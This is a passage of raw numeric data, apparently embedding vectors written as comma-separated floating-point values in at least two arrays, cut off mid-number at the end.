0.0030327132,0.0081762895,-0.0017115405,-0.019475255,-0.001670625,0.0029724534,-0.012994505,0.0055308836,-0.018468522,0.006244129,0.02196926,0.036607694,-0.022831999,0.017271863,0.0031240403,0.0076529267,-0.009714138,0.0071393065,0.027048372,0.009608332,-0.043600727,-0.02162522,0.026887631,0.018680513,-0.016384816,-0.010848685,0.0056487676,-0.0050980756,0.007498515,0.015095605,-0.00049790676,0.022013254,0.00095858984,-0.0014166888,0.014596835,-0.0039711427,-0.0075094714,0.024899516,-0.019281302,-0.0023682772,0.0011682587,-0.012725979,0.009461926,0.0061711473,-0.005302781,0.028384386,-0.0031290406,0.016134022,0.052011516,-0.011060585,0.018560346,-0.01332842,-0.008988795,-0.015480067,-0.0043133195,-0.032842334,0.006091868,-0.023252664,-0.016795108,-0.004336299,-0.010020625,0.0033517417,-0.018550597,-0.013045594,-0.12506863,-0.00013057758,-0.013964425,-0.0002595181,-0.02497538,-0.008533626,0.0080037955,0.016383605,0.005872849,-0.042546727,-0.017807053,0.034529652,-0.00057670113,0.005227997,0.0010029142,-0.0100851,-0.03981223,-0.009618751,-0.01690366,0.015237972,0.0035185276,-0.010050055,0.0020945685,0.005868129,0.0018566854,0.002068997,-0.0025030451,0.012840914,0.008457271,-0.000030001498,-0.00548516,-0.006507918,0.015151542,0.023678184,0.007501013,0.009647465,0.007730407,0.0013153488,-0.008006906,-0.001573983,-0.002093331,0.0016697,0.0066305087,0.0030776435,0.027165936,0.018746933,-0.0045732837,0.026765246,0.011690328,0.029380433,-0.031090964,0.008705793,0.008873038,-0.0035692756,-0.0046383706,-0.0045291753,0.005133892,0.0056252447,0.0041363784,0.011163159,-0.011688237,0.004458004,-0.0034910024,0.004749511,0.013112999,0.018538048,0.00007004584,0.016646186,-0.02136976,0.0014047239,0.003883119,0.017481675,-0.000110390894,0.0048981067,-0.00097036327,0.024353566,-0.00095553143,-0.013337846,-0.018234637,0.01905594,-0.017733904,-0.002687898,-0.009232694,0.018379623,-0.009378344,-0.0039357943,-0.0011529485,0.014728431,-0.025049524,0.0014334267,0.0021752564,-0.0004529765,-0.001603244,-0.013588113,-0.018958952,-0.001539304,0.004170474,0.0062351585,-0.005304793,-0.0039499085,-0.0047158203,-0.008625929,-0.006376851,-0.016905759,-0.13028036,-0.028041024,0.016858168,-0.0019970804,-0.018808099,-0.016027382,0.011871195,0.0037603287,0.044002715,0.004581842,-0.009361933,0.011215558,-0.0016022564,0.0048272037,-0.016200323,0.007915168,-0.025238806,-0.014112354,0.0048325458,0.005979986,-0.0004977148,-0.014095075,0.008915871,0.008183462,-0.009090956,0.004541494,0.013107697,0.031041594,0.02460592,0.008059312,-0.0074478337,0.010119876,-0.0027773583,-0.010555064,-0.048862506,0.009008197,0.005460094,-0.018430835,0.0027427343,0.016993916,-0.010140799,0.00062641565,0.020468445,0.0045835073,-0.011348496,-0.01269953,-0.0001294464,0.032005344,0.00040002447,-0.0077134776,-0.00962933,0.008835923,0.0022335,-0.006349344,-0.013999495,-0.011101939,0.0022524402,0.008519712,0.008087363,0.013962477,0.014457398,0.009596525,-0.0046330597,0.024268012,0.00107657,0.02143016,-0.013103839,0.007532927,-0.0041813804,0.0185904,0.009678404,0.027950501,0.0042365342,0.00070789724,0.031910274,-0.0024197614,0.0083385855,0.024570815,0.015497148,0.003936345,-0.005139327,-0.012389899,0.014488444,-0.0013081863,-0.02299176,0.014541583,0.015136807,-0.014748041,-0.015784485,-0.004761883,0.012874237,0.0036159612,-0.002365827,0.024015745,0.015975937,0.0122128455,0.053192455,0.003357883,-0.024941806,0.0015687983,-0.0038894557,-0.0069971145,-0.008341526,0.009595451,-0.017101802,0.018697448,0.03589926,-0.0044493116,-0.005651425,0.0052322494,0.0053944993,0.025136849,-0.0010416191,0.002356744,0.012380982,0.008501399,0.0032365373,0.008681257,-0.00824298,-0.0031728235,0.010411214,0.01645518,0.0065994035,-0.024089647,0.014960278,-0.01007645,-0.0139366,0.010873876,-0.008270675,-0.01755246,-0.0037647104,0.008991791,0.030288633,0.0020289826,0.005846424,0.012718983,-0.02143595,0.011360925,0.006609932,0.01773985,0.012114539,-0.0068105278,-0.0037403668,-0.0033610866,-0.0040552737,0.0037422031,0.0039603645,-0.018854022,-0.010276523,0.012350876,0.0033606058,-0.027451755,0.024746358,0.024171628,0.0036523337,0.009359882,-0.0052206926,0.0019609807,0.001352149,0.01916333,-0.018694358,0.030937336,0.026561746,0.0024489462,0.00097044377,-0.017697351,0.0013470093,0.010436957,-0.0024956244,0.023520479,0.007840881,0.0036055166,0.005864882,-0.042168606,0.006846456,0.017417077,0.021022977,0.017096272,0.024029136,0.025749616,-0.01054959,0.004016509,-0.015096674,-0.0037368012,-0.0008370201,0.020715248,-0.0067967335,0.005318311,0.0049479203,-0.013817772,0.04195625,0.004257346,-0.014031486,-0.021901263,0.0010445073,-0.0009686083,0.0021010465,0.009716729,0.00039540292,-0.00032889264,-0.01137292,0.0060009593,0.010703504,-0.013011711,0.008995175,0.014885635,0.0029692526,0.018645482,0.0134072695,-0.015689893,-0.017938228,0.021480052,-0.009252319,-0.003871746,0.0021039257,0.014204715,-0.0016643226,-0.01994048,0.009345507,0.012759142,-0.0023621225,-0.003451688,0.012219493,0.002559492,-0.0050461553,0.035407033,0.016725376,0.016991045,-0.043402582,-0.02015636,0.004542775,0.0054653184,-0.041489687,-0.01529678,0.002812894,-0.0052474146,0.013008161,-0.0026356992,-0.0025645113,0.00312218,0.025110196,0.009730959,0.026838344,0.026697103,0.0131719755,-0.0049954616,0.005000063,-0.013618879,0.019866234,0.030586418,-0.010010769,-0.007140588,-0.00019996149,0.008491521,-0.000114241826,0.010615572,0.0026467212,0.0011785867,-0.00022104179,0.014813663,-0.041198164,-0.0068969373,-0.018905912,-0.007603793,0.010104913,-0.00657911,0.0005771956,-0.014895477,0.0051944843,0.0145882005,0.022405319,0.019112786,-0.01851294,0.017307054,-0.018121477,-0.010909674,0.0016885515,-0.0023742781,0.016083144,0.0026897707,0.004247778,-0.017015338,-0.002587771,0.017450048,-0.008214646,0.0022782385,0.0018697594,-0.0013526987,-0.0025507319,-0.0070528374,0.0024944334,-0.009112151,-0.0050550485,-0.027854042,-0.0068255714,0.015657244,0.00943057,-0.011735433,-0.017845046,-0.0015389551,-0.0035839432,-0.023003355,0.0017294778,-0.0036783775,0.0056131696,-0.0043533426,-0.010004645,0.013927183,0.004758725,-0.010940327,-0.019086814,0.0019425481,-0.010223082,0.006630247,0.010803584,0.0007133952,-0.00785568,-0.008351427,-0.036804434,-0.027743872,-0.000021373045,-0.021006407,0.0056505552,-0.010680368,0.011410638,-0.008043481,0.0092726955,0.024754448,-0.009868134,-0.0031510787,0.015367822,-0.020159505,-0.0010594,0.012801787,0.026778536,0.009175126,0.032542806,0.029400276,-0.012508171,0.008767033,0.002479133,-0.0052167005,0.0061430656,-0.0038496803,0.011449053,0.0140983295,-0.011538976,-0.0018724854,0.010857201,-0.013113925,0.0014301288,0.0075916057,0.013356738,0.004166325,-0.015632575,0.008951623,-0.0314669,-0.0027740865,0.0022369295,0.007554431,-0.018407939,-0.0012931556,-0.018764129,0.0060702562,-0.006680504,-0.020051204,-0.024267443,0.013298678,-0.022536395,0.007966402,-0.0076296413,0.028783865,-0.01412496,-0.033076074,-0.012623533,-0.102933444,0.0019366753,0.023102582,0.012572655,0.061494302,0.02298185,0.0013933891,-0.0020125073,-0.0056336313,0.011476435,0.0054049212,-0.013528345,-0.029160937,-0.0035834739,0.03861987,0.007089846,-0.006914137,0.0038107855,-0.0003890695,-0.032843757,0.0021098715,0.0035161902,-0.020958155,-0.006048691,0.026790407,-0.0018442784,0.0010619303,0.0012604583,0.003461493,-0.0051722885,0.0037353898,0.0020934104,0.010944481,0.0015035842,-0.020207819,0.028076563,-0.0014996927,0.0217669,-0.010849576,-0.030731002,-0.0026461158,0.013941891,-0.0015284226,0.0060774446,-0.031456396,0.013418902,-0.022767015,0.005173824,0.011936253,0.0055655125,-0.011504813,0.025049014,0.005527345,0.013592478,-0.012547382,0.0009025365,0.014062909,-0.0075873337,0.020163381,0.002695265,-0.026390823,0.011345903,0.009591773,-0.020371806,-0.0020848766,0.0035685408,0.0052123675,0.030061726,-0.0038698942,0.0053176284,0.0134382425,-0.03490766,-0.000727325,-0.0011280696,-0.010877176,-0.006026499,0.014570711,-0.00685188,-0.0009047822,0.012610749,0.06400531,0.0028409092,0.009521024,-0.008221691,0.014470764,-0.006482546,-0.0055060796,-0.02236984,0.01104704,0.016234815,-0.02484208,-0.015420011,0.024436224,0.0029497105,0.0060117417,0.009794203,-0.004563056,0.005558696,0.0063169864,0.0039032393,-0.0069582826,-0.0125113595,0.0016526213,-0.0100564025,0.0074420795,-0.011195872,0.0074555953,-0.011500288,-0.0068927663,-0.010469356,0.0016207437,0.025089573,0.032872766,0.038231768,0.0071829497,0.019770537,0.00453685,0.016006634,0.008842403,-0.037992056,-0.0063292333,-0.010330235,-0.0141263185,0.037905235,0.021483524,0.006533477,0.005314963,-0.001208726,-0.00030544997,0.0004893034,-0.0075815595,0.033205323,0.0005681047,0.009970463,-0.02531329,-0.012573647,-0.019590572,0.024330353,0.0148129,0.037656646,-0.000145458,-0.037973627,0.0081215855,-0.005778292,-0.03007969,0.020158092,-0.021009143,0.011232144,0.007279491,-0.009902605,-0.020210799,0.021771617,-0.003481746,-0.0011981854,-0.0070901955,0.013725282,0.0075052003,0.018137744,-0.009493282,-0.0025881024,-0.0076828445,0.008015341,0.0089970175,0.004779818,-0.023289943,-0.0039898213,0.008693491,-0.0032371278,0.0024354996,-0.009891477,-0.011935655,-0.009643816,0.0013323423,-0.020184258,-0.030873885,-0.009071056,0.01857856,0.032676015,-0.016895635,-0.0011315588,-0.024622263,0.008358051,-0.010776076,-0.008901625,-0.014357236,-0.015385661,0.0032229363,-0.009061155,0.013561468,0.014903562,-0.0043101218,-0.0056160055,0.0017920146,-0.013915847,-0.006965277,-0.004477344,0.011845492,-0.0064382795,-0.0075517297,0.00975398,-0.019569103,0.007782983,-0.015077692,0.021145366,0.045108438,0.015730727,-0.0039947145,0.021482954,-0.010189616,-0.0053038145,-0.009219999,-0.007204413,0.008476285,0.13966535,0.0017215074,-0.0013967318,0.0013147922,0.0077448464,-0.012092766,0.020085204,-0.00038521393,0.0015002284,-0.002157548,0.026478566,-0.006086906,0.0065890043,-0.0089492705,0.002430005,0.029253563,0.021313814,-0.017799448,0.014023165,0.014581715,0.008941843,-0.020261962,-0.015166453,-0.047671903,-0.013793473,-0.07120153,0.0312882,0.016017135,0.012274282,0.019187585,0.002505166,-0.007308534,-0.017105516,0.024825577,-0.012030594,0.010553291,-0.01042146,-0.008336309,-0.0020432756,-0.0151800765,0.027523918,-0.004789175,0.0051185414,-0.015163194,-0.01374759,-0.00511295,-0.013561348,-0.024323259,-0.0043714354,0.0025511135,0.004786503,-0.006467138,0.0012411864,-0.012738599,0.014735399,-0.005924274,0.0049430686,0.0066003334,0.015366142,-0.012611101,0.002170844,0.0008996101,0.0061840205,-0.0006911911,0.025563033,0.008466163,-0.0093716625,-0.006194907,0.0033093903,-0.004624419,0.023124859,-0.015132977,0.00015228959,0.00028032615,0.0070256,0.0055577927,-0.0128387995,-0.01142887,-0.009568958,-0.0029609045,-0.013172288,-0.0003950154,0.0082861865,0.018460097,0.01670261,0.0016271808,-0.012212595,0.022491599,-0.0072077983,-0.009414902,-0.020224307,0.023873094,0.019535169,0.0051836707,-0.007845455,-0.01087559,0.024069734,-0.0016047119,-0.021712119,-0.00395342,-0.018222574,-0.010103995,0.007775847,0.01869669,-0.005950112,0.0046950113,-0.012522062,0.005669783,0.00085670047,-0.0020409294,0.0013815629,0.012050614,-0.00288682,0.017264195,0.006026413,0.043647077,-0.030868743,-0.006496175,0.011693404,-0.026888156,0.004468739,0.0025647897,0.019980941,0.034348514,-0.004296508,-0.0014452798,-0.020331422,-0.01656042,-0.00909355,0.0021691325,0.0031219486,-0.021593492,-0.000049941427,0.017939353,-0.008783225,0.008882591,0.011059444,-0.0026902822,0.008414314,-0.0059087295,0.013944206,-0.01333187,-0.009468182,-0.01161855,0.008502002,-0.027932025,0.020550774,-0.006802536,0.013327103,0.0073600993,0.012956769,0.011918496,-0.02066591,-0.012029124,-0.009676554,-0.020974291,-0.012607559,0.008934216,-0.0031405103,0.0010855343,0.017177409,0.0071330685,-0.0034651663,-0.052334297,0.023333829,0.009807363,0.011962553,0.01227508,0.003672844,0.006022827,-0.001717988,-0.0051222984,-0.00013398194,-0.00032619454,-0.039139267,0.00844098,0.025874509,0.011943678,-0.028195797,-0.0057444857,0.009866505,0.019389948,0.000036017656,-0.011102962,0.04171039,0.0055072303,0.0058635287,0.0012676475,-0.011649336,0.025385024,-0.009090641,0.005859994,-0.010005975,-0.003973272,-0.0071291747,0.023869634,-0.027786156,0.03370626,-0.022715485,-0.046398822,-0.012304615,0.0023991964,0.010994374,-0.022323826,0.004071388,-0.01123879,-0.0017333126,-0.01439842,0.0029116527,-0.011188922,0.012448903,-0.012556931,-0.019100279,-0.031497125,-0.013819631,0.009131069,-0.004286695,-0.019737553,-0.0030142854,-0.007960665,-0.004730908,0.004527819,-0.003194192,-0.013026096,-0.00427371,0.008406143,-0.02691911,0.020712966,0.008017851,-0.029136475,-0.009686283,0.008188514,-0.008260785,-0.0027084851,-0.008797379,0.0019515706,0.021465274,0.021358395,-0.010873372,0.028803416,-0.007580405,0.008521691,0.031260177,-0.0021496785,-0.034083057,0.0007659788,-0.01316796,-0.017398858,0.0076136375,-0.009012888,-0.027630128,-0.004528433,-0.01970803,-0.008335862,-0.026571926,-0.018204588,0.008782793,0.017193958,0.0072641918,-0.0066697635,0.0061901594,0.02466256,0.0053524636,0.030495683,-0.0062292214,-0.01753185,0.0143131325,-0.011314964,-0.0062009892,0.00231759,-0.0049301838,0.008745425,-0.012763906,0.015640346,-0.0009462195,0.0005837184,0.001470947,-0.0061140386,-0.003985832,-0.018631613,0.005501076,-0.025927035,0.0074712094,-0.0041383696,-0.013082971,0.010967991,0.0036061988,0.035893794,0.060450763,-0.0761096,-0.011102562,0.0016713701,0.007494663,-0.020924317,0.016184272,0.008140224,-0.016815733,-0.030713016,0.009862818,0.008304409,-0.011923285,-0.03449613,-0.023011856,0.008801243,0.0028500461,0.0025246746,0.027667038,-0.027809132,-0.0050085536,0.012148727,-0.011096312,-0.00081217446,-0.001975335,-0.01666902,-0.008297009,-0.017473154,0.010262745,-0.019283786,0.013518327,0.009283861,0.004392665,-0.014293173,-0.00036563797,0.010163724,-0.015631413,0.02067038,0.00828252,-0.01685995,-0.029531317,-0.016950592,0.0011878223,-0.0015837221,0.0058387932,-0.017136648,-0.005793743,0.021696936,-0.016807683,0.1276215,-0.010946666,0.009478863,0.008643262,0.0018093617,-0.009137764,-0.0025889184,0.024766466,0.00093259575,-0.006004714,0.011549079,-0.0098313205,0.008182935,0.012469734,-0.028826054,0.00983487,-0.00872766,0.12830587,-0.013879975,0.03596875,0.021095905,0.0060515287,0.0022215315,0.0042900634,0.007516264,-0.07765687,0.00854313,-0.04774683,0.0060435575,0.005909494,-0.041427784,0.028084913,-0.01347021,0.007309648,-0.02054447,-0.0001465277,0.0097240275,0.0000069040616,-0.036894035,-0.00061211694,0.023238605,-0.004634339,-0.013152461,-0.003919502,-0.023863928,-0.002016302,-0.010766427,0.013911325,0.008321866,0.0119320825,0.017055808,-0.0025278828,0.019486176,-0.0092408415,0.004385476,0.008969778,-0.0055981693,0.0028608243,-0.021203268,0.006973043,-0.014504016,0.004907147,0.008181676,0.031190379,-0.016127126,-0.004675138,-0.009561016,0.001578236,0.02893225,0.010259559,0.019781027,0.011148089,-0.0025529773,0.00021402285,0.033176363,0.011601906,-0.012950258,-0.005129028,0.01543255,-0.011042463,0.029985791,0.005181249,-0.015329015,0.007045798,0.018893639,0.019055324,0.01842164,-0.0081162965,-0.009514916,-0.022454346,0.012866691,0.0049915095,-0.018637814,0.010719523,-0.0026250866,0.019956738,-0.004488918,-0.007767975,0.022688879,-0.012782611,-0.0026052978,0.026293717,0.0019516303,-0.0044759186,-0.016511334,0.006421915,-0.015310763,-0.036851913,-0.0024760186,0.0054340633,-0.011573748,0.017718742,-0.010781935,0.023812704,0.010180783,-0.009137063,-0.00016970519,0.004079622,-0.028403698,-0.010786663,-0.008324676,-0.0040820646,-0.0043000374,0.0070200814,-0.01719191,0.0021748638,0.009649718,0.018270666,-0.0017370839,-0.00028201842,0.0011602354,0.000827143,0.012188523,0.042435706,0.0070677195,-0.020753419,0.017971821,-0.017708564,-0.030055901,0.010586026,-0.0022836793,0.00797908,0.011902996,0.006656258,-0.016869038,-0.015727628,-0.012762922,-0.01975551],[-0.012964604,-0.0035668202,-0.006639936,-0.009321157,0.0051811174,-0.028844964,0.0064253304,0.013367404,0.01106292,-0.011797684,-0.00087344507,0.027541028,0.01746119,-0.014432547,-0.019411268,0.0110166725,0.012372661,-0.0041948324,-0.0035003077,0.001200237,0.010227948,-0.0012054255,0.023037188,-0.008171249,-0.00816689,-0.010973626,0.004131356,0.008005274,-0.0038113603,0.012350715,0.019043531,0.023149999,0.003252587,-0.0014543297,0.017164899,0.003252123,-0.020252451,-0.01983191,0.0040894407,-0.005402557,-0.020033443,0.013564148,-0.009992211,0.019757055,0.0012026718,0.0144886,-0.013424226,0.011370126,-0.009237644,0.001652662,-0.016458167,0.00027757767,-0.018827608,0.020236347,-0.012439621,0.012216724,-0.005898599,-0.017820673,0.01733035,0.010082616,0.010924639,0.0016580254,0.0050813807,-0.0067223413,0.038204696,0.0042208983,-0.00093386957,0.0019271149,-0.011390912,-0.021137344,-0.004711533,-0.012201142,0.009986432,0.010237007,0.028685194,0.022198891,0.0016348267,-0.03433747,-0.012715532,0.01742907,-0.023043348,-0.0064471127,-0.007524741,0.0013043578,0.022372598,0.012763597,-0.0036605606,0.015338229,-0.014512063,-0.024783142,-0.0065367385,-0.012423069,0.007163018,0.012303177,-0.014027933,0.011854838,0.00791575,0.003587969,-0.01129891,0.01502923,-0.005648506,-0.022399997,-0.030240348,0.0015293475,0.00054117444,-0.010290441,0.014632137,-0.018297587,-0.014697923,0.0034340038,-0.0006598888,0.016860245,0.0089217145,-0.005966455,-0.011062989,-0.009203434,-0.007248053,0.0015832251,-0.018759185,0.017531531,-0.018450703,0.043287773,0.0055042063,-0.0013284095,-0.010525925,-0.0076039876,0.0025272788,0.00983548,0.0038328576,0.011564849,0.004833386,0.006176733,0.00429561,-0.0071418,0.0014569325,0.0041644583,0.008062066,0.00038058238,0.01570991,-0.009318231,0.016112287,-0.01700789,0.018844042,0.0063147238,0.01906524,0.009178044,-0.002089248,0.015825063,0.012411483,-0.011629591,0.008166443,-0.0073771193,-0.010298979,-0.018257322,-0.00054324593,0.022175224,0.005030237,-0.024436096,-0.016399449,-0.009486523,-0.0036718026,-0.0068412717,0.0021980896,-0.008278704,-0.027002718,-0.039027784,0.0034869928,-0.01167906,-0.018013446,0.01423277,0.03327597,0.024392072,0.016114468,0.0064943433,0.0064140717,0.016251031,0.009990704,-0.02971149,0.011253134,-0.018644651,-0.0046860185,0.035399973,-0.016901188,0.010217583,0.0015639864,0.024184488,0.028974203,-0.0133604035,-0.0031948574,0.00299687,0.016054677,-0.0184404,-0.007942363,0.00308873,-0.023725368,-0.02146664,-0.020506317,0.11096448,-0.012776129,-0.0020202857,-0.026993686,0.013723459,0.022112835,-0.017804816,-0.00494183,-0.00965329,-0.010272506,-0.011112612,0.010959391,-0.0030245087,-0.015537375,0.009262795,-0.017953867,0.005378612,0.004486835,-0.0583261,0.02957032,0.014342099,0.007861452,0.0018591783,-0.032052964,0.0003302291,0.014085023,-0.038717277,-0.032521587,-0.024053177,0.0022336454,-0.00018576042,0.004087021,-0.020014679,0.016565049,0.022809451,-0.027595513,-0.023086485,0.0026134057,0.0016341199,0.007291596,-0.020231003,0.007050716,-0.010628749,-0.0074692373,-0.0015406711,0.010349112,0.047166403,-0.022855151,-0.0048286165,0.017157456,0.011049792,-0.03032734,0.019903883,0.0018197973,-0.018806957,0.00878367,0.010962583,-0.0141639095,-0.018206276,0.011813158,-0.0060286135,0.005208392,0.016506493,0.029538224,0.025081035,-0.0003754757,0.02657666,0.05685023,0.013023274,0.01945638,-0.03619084,-0.0006279684,-0.017422985,-0.034495056,0.00082738,-0.0022007178,-0.005090132,-0.0047724345,-0.009996181,0.0149726495,-0.000081141196,-0.0014135451,0.013160253,-0.0020489364,-0.0032503863,-0.005136975,-0.026098337,-0.006565486,-0.00021121443,0.0027893784,0.013214731,0.021091271,0.008698137,0.0052146697,-0.018639065,0.016589789,0.0052948645,-0.02165439,-0.023651412,-0.0051061707,0.017972877,0.016042976,-0.004371628,0.008507864,-0.0029732909,0.02849408,-0.0114341425,-0.0033313138,-0.005918479,-0.010469372,0.039342217,-0.015122567,0.016525462,-0.02827097,-0.012037439,-0.0074064005,-0.0067719747,0.0023892492,-0.009523947,-0.0008322116,-0.01795347,-0.017989768,-0.004049923,0.021693941,-0.022469828,-0.011210101,-0.02106357,-0.01356278,-0.0009637177,0.0036042216,-0.015988115,0.02459619,0.0023556047,-0.0031570347,0.012874421,0.019077186,0.0026434294,-0.023727462,0.031162035,-0.017390374,0.025300672,0.014880187,0.009215255,-0.022105226,-0.014214172,-0.026955515,0.0034086376,-0.0040346845,-0.009183681,-0.000016683378,-0.005757587,0.014114627,0.0017977811,0.01962604,-0.020774167,-0.010441535,-0.016348155,-0.014165522,0.006110805,0.016765038,-0.0024816813,0.015103309,-0.02244194,0.018632568,-0.013387587,-0.008955,0.018321969,0.0881322,-0.0007503228,-0.0027271265,0.0067813187,-0.02507558,-0.0057728984,0.04215175,0.018579276,-0.016536502,0.00038878145,-0.0064289863,-0.02891969,-0.0032637368,0.006129139,-0.02805903,0.011428958,-0.02608745,-0.011415862,-0.045225453,-0.012481148,0.02574325,-0.012092843,0.006585615,0.025377225,0.0043797847,0.011337273,0.009290246,-0.009441771,-0.010729275,-0.027053427,0.0055195247,-0.025490103,-0.00159401,0.01296755,-0.050418537,-0.0007605176,0.026011594,0.004676086,-0.010099047,-0.0060629086,0.009367985,0.018410828,0.014959601,-0.0021344498,-0.004509065,0.027022762,0.0099812625,-0.009476985,0.003810608,0.013205371,0.0073864753,0.037552293,-0.015581754,0.01866002,0.0011707948,0.022257186,0.014001939,-0.034549862,0.025074255,0.020060932,0.00078336225,0.01480269,-0.014366731,-0.014491673,-0.0000451114,0.023239864,-0.00942008,-0.016715255,0.009492195,-0.003609041,0.02055372,0.002063059,-0.026314225,0.016628373,0.001025297,0.01782715,-0.0067248014,-0.0076208287,0.0095106475,0.0045758965,-0.012546289,0.010763619,-0.003548031,-0.007967676,-0.009969527,-0.002626004,-0.0013081857,0.002393098,0.015194912,-0.0144278975,-0.008553707,0.012766813,0.009347606,0.011844176,0.009436917,0.038782723,0.008950211,0.028518757,0.00536682,0.016243946,0.011410717,0.015159796,0.0048594885,-0.011625397,-0.005474407,0.015581306,0.006803198,-0.01525177,0.007410758,0.025203142,-0.015996221,0.012605919,0.00031140033,-0.009652445,0.0060773967,-0.029828113,-0.0055575264,-0.019847995,-0.0080360295,-0.01812598,0.009921881,-0.020468732,0.008102396,0.0019495563,-0.003548325,0.0048944177,-0.0068191355,0.012797767,0.0044787023,-0.006205177,0.0038475704,0.049188595,0.016874472,-0.024162,0.030304842,-0.006444126,-0.0014557781,-0.02833366,0.03969585,-0.015767168,0.015436192,0.009006032,0.0334572,-0.004527782,0.01160038,0.0073408755,0.019922165,0.0036742864,-0.03098498,-0.009350338,0.0021540516,-0.0002212789,0.007974281,0.000020481739,-0.00020160958,0.019556599,0.0419364,-0.042643312,-0.0120098395,-0.0139189735,0.029075265,-0.01477063,0.007931013,0.0046598427,-0.010274283,0.022546291,0.0020876073,0.06055764,-0.0060766544,-0.020583116,-0.011297777,-0.0031093047,0.015963145,-0.018016323,0.02618421,-0.03810264,0.01165959,0.01263317,0.02949512,0.01034713,0.001619051,-0.007391991,-0.00805524,0.0067421515,-0.005759935,-0.016651878,0.012687854,0.011492495,-0.0097041875,-0.011556981,-0.020051727,0.0038022273,0.011496222,0.028656377,0.0032081162,-0.010495776,-0.002367742,-0.019630553,0.016993292,0.0071135066,-0.0060029156,0.0148247825,-0.0023375172,0.010707328,0.00283685,-0.020800335,0.030071199,-0.01911052,0.005908896,-0.0054820054,0.021270417,0.020031106,-0.0098685445,0.0019410287,0.018172378,0.024382291,-0.0038903335,0.0070081395,0.002597163,0.006618424,0.030962657,0.00021635939,0.0042587165,0.0023858903,0.008792352,-0.008777775,0.018958334,-0.014865299,-0.011926604,-0.030701289,-0.010192938,-0.014130462,-0.0016967901,0.02321132,0.011617167,-0.01415261,-0.015130664,-0.014075189,0.016462142,0.0015872709,-0.008275162,0.022155333,0.0064594066,-0.00569854,0.013027919,0.01167487,-0.008213139,0.0059195827,0.013182711,0.004183946,-0.0038395212,-0.000762029,0.0139532685,-0.005123696,-0.011095113,0.015440805,0.0006865497,-0.0013463916,0.0010142664,0.0069947406,0.017606633,0.022409353,0.01927541,0.0024789528,-0.03015865,0.00094361155,0.024277529,-0.027603857,0.0053358604,-0.020587333,0.046866685,-0.01258981,0.0057048476,-0.0070272055,0.006412699,0.008026477,-0.011785332,0.015089534,-0.043974448,-0.00054953253,0.031995174,0.0020008688,-0.007742606,0.042230748,0.015565125,-0.008756894,0.011699816,-0.013587712,-0.009216742,0.00758538,-0.0017256947,0.012082271,0.0025451719,0.007753829,-0.041419756,-0.010680982,-0.0148223,-0.042066164,-0.025538031,0.057876125,0.003023384,0.012415435,0.00774303,0.015850065,-0.0005436185,0.0034744607,-0.0019112077,-0.021953695,-0.00766029,0.0198903,-0.020086382,0.0014885667,0.01776192,-0.004523213,-0.015220655,-0.025135353,-0.011220702,0.010931508,-0.0046622897,-0.016774438,-0.008207143,0.018512653,-0.009977984,0.022574896,-0.03204078,0.017298833,0.016563248,0.045342144,0.028321885,0.00503675,-0.012329437,0.006590572,-0.007489572,0.005124263,-0.010581547,0.017551992,-0.009472428,0.016264819,0.012941204,0.006667938,0.013940338,-0.02283486,0.006153575,0.019423123,0.03416972,0.023940563,0.005909451,-0.00046998222,0.020669736,-0.001609374,0.0002224918,-0.028707677,0.027361175,0.01471346,-0.006023143,0.040043093,0.02361509,0.005315108,-0.01663475,-0.014445916,-0.0058641257,0.01834599,0.029277097,-0.008871807,0.03224598,0.00048630053,-0.0025636558,-0.008653307,-0.021877773,0.0012481407,0.009670071,-0.004555814,-0.012393483,-0.0009964872,0.0064538606,-0.042729657,-0.005745565,0.0010636437,-0.014099377,-0.0055837724,-0.010732846,-0.012751061,-0.0015328369,-0.010256654,-0.030558676,-0.022290032,0.0063847327,0.026490873,-0.024883667,-0.008528612,0.0033998364,0.004329584,0.008029731,0.01489664,-0.011783389,-0.020427663,-0.0019687526,-0.010301614,0.026222289,0.022274625,0.011572274,-0.013530622,-0.004912122,-0.026570853,-0.011404991,0.00053966197,0.0134380665,-0.005546199,0.020007338,-0.004155613,0.018934373,-0.009314459,-0.026762204,-0.029137708,0.016084159,-0.052973006,-0.010986127,-0.0013987157,0.027311955,0.004322559,0.032145396,-0.021206584,0.02504406,0.023950905,-0.0324091,0.007606227,-0.035002746,-0.00844564,0.02730986,0.0050405907,-0.018119808,-0.0141685065,-0.01167704,0.008524974,-0.0003670829,-0.007926164,0.019414734,-0.011434983,-0.023714818,-0.007494795,0.008523641,-0.017167106,-0.007286102,-0.008522578,-0.038090866,0.038526464,-0.0044909497,0.022079045,0.009329125,-0.002921441,-0.008553343,-0.008396709,0.02767936,-0.01851043,-0.013061322,0.019569676,-0.010100611,0.00096532656,0.020228814,-0.04080227,-0.032846764,-0.034180563,0.005573147,-0.009683325,0.031642165,0.0033481352,-0.010023166,-0.012377299,-0.0024841984,0.0045494963,0.0025618968,-0.032687977,0.0021667157,0.0018113389,-0.013010324,0.010441401,0.023759896,-0.025739111,0.0071034003,-0.0074682846,-0.0017521748,0.019326549,0.010211261,0.0003589324,-0.0033496143,0.016177848,0.02116342,-0.011519556,0.028783837,-0.015821036,0.017987976,0.03213714,-0.0008349489,0.021202495,0.009305526,-0.026192743,-0.01720956,0.014073329,0.012413859,-0.014212808,0.001158733,0.0042842454,-0.0012129353,-0.009373389,-0.00775756,0.02228054,-0.002122359,-0.0060821977,0.020083094,0.010826301,-0.027557436,-0.035013933,0.008774943,-0.010673699,0.009743154,0.016356694,-0.008764335,0.015885985,0.03070265,-0.003836519,-0.0067555727,0.005162624,-0.014760149,-0.0011221037,0.006913801,0.003121218,-0.013970379,-0.008605482,0.037556045,-0.020487918,-0.013860965,0.0007324257,0.0049139066,0.015642203,0.0041482975,-0.008048985,0.004212396,0.01533632,0.005008887,-0.013468783,-0.004170035,-0.007373435,0.024650842,-0.023441978,0.03209575,0.013168992,0.010446836,-0.009773557,0.00815415,0.009276471,-0.01290462,0.010152685,-0.011196257,0.014540574,0.0015391534,0.00015605056,0.0019774484,0.0034630983,-0.019671164,0.030152656,0.010105823,-0.0066406294,0.01126214,-0.02366956,-0.019639159,0.012083675,-0.0034043472,-0.020583568,-0.0007329825,0.0251059,0.017881857,-0.013356739,0.00052152795,-0.040995926,-0.08233312,0.014026155,-0.011404618,-0.009106341,0.0036868358,0.007189154,0.003977677,0.014446484,0.03356493,-0.010648993,-0.0011292022,0.018328257,0.001631777,0.0021704915,-0.002938689,-0.0010678484,-0.018545933,0.015551363,0.010631754,-0.00013591436,0.015762514,-0.017044669,0.007959846,0.0027304436,0.028895127,0.00020981889,-0.013739453,-0.0183676,-0.026974453,0.003906478,0.011218525,0.009590903,0.006222454,-0.007823902,-0.018074105,-0.0030071358,0.003244488,0.01500255,-0.016174626,0.009364652,0.002440